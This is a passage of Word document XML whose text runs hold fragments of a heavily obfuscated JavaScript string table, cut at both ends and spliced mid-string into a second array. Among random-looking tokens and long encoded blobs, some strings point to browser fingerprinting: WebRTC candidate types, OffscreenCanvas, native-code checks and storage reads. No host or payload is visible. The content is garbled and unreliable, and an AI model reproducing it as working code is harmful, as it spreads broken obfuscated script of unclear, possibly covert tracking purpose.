      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvH&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA","uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "QnegWe5abZtfVg", "name","JmWMSexUJZwJbaT_1w", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg","oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "Kesnoz3g8k3FpQQ9", "6_c", "pd4LuWvKhxTEpgc", "7iTRE6xxBddfOOOu", "sPVR6SOgknGhgA", "7fg", "fjzya_01MJkRa9X_", "Int32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SBDtRKMSRNNSeOzDxg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mL8sh03E4062lCwuK4rfFn3IquGvG4I", "1S65F9FBaQ", "vD_2KJkhD8sLZpe-", "cn7sYIQkQsdUE5iavg", "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "jyPZSaocE_E-UuH_yiNHybI0d0dBz1H6Kpb7kDg4qiM", "KzafEuBXFq4nb-2vhRVR9u8n", "q-QFx0TO", "9PJTujPk", "TiyaKZ0qb-JlGa674g", "EDW9TpxKAeNaAA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "443", "get", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"lbECiFqZ3QXQwWIoCte6PTik", "F8Iewk7TszvT60QgEvXPLH0", "Z9kj5kTq7xbfiRpXeLajSxOUrPfXLPhzsGArHMS8eb5ZNL3Q0Nvmuno", "GEKcTPV2Ho9uaQ", "7QjtEqwGNPo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "from-page-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1zC6WOVFM7EXQ5ee", "qTbXbbYySOlDSOfRvA9wheY5UgoyzR7U", "YsECpHeT6g", "r4A06ln17zW-gh9L", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifsoiEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "oiD5csQFBKo", "WjKUUeRILKY3daLp0CIO4qEOZkpvxEe8Ytes-1Vl71iezicXV3wYHI4upiCN58XFHhS1NB2Ub-u8eraLDtVmdw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTzSeKY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HWvxH6k4EOVVSw", "KzO6RvxXZakpNb2_qXx4xP1ceA", "CIJ1mwLd11SxlWsOKQ", "Document", "5sNu5gKywHLo6mYxd9SOOGXv77fTL6wl8A", "CIJPyT6_ow", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FCS7RfF2c_kf","ydBfsSq1g2ropXoiUsSAMFGijceIIuQ4mwcKR43MIelCWcGUwduUinyXAP4oXw0srpEyj_JcnUE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vvoNn3Lg1w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8Tu-fo9KCZ0JTsqzijB925AvNjxIu0yBStPJiGE2", "URL", "EZI04A7a", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sIhhvwbV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Error", "sFKNAMlIXLlDMLa4mQ", "HKgD1Q793GGJtmISLKmFKwjl98w", "Mt1NqAylvXU", "assign", "S5UH62HIwQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
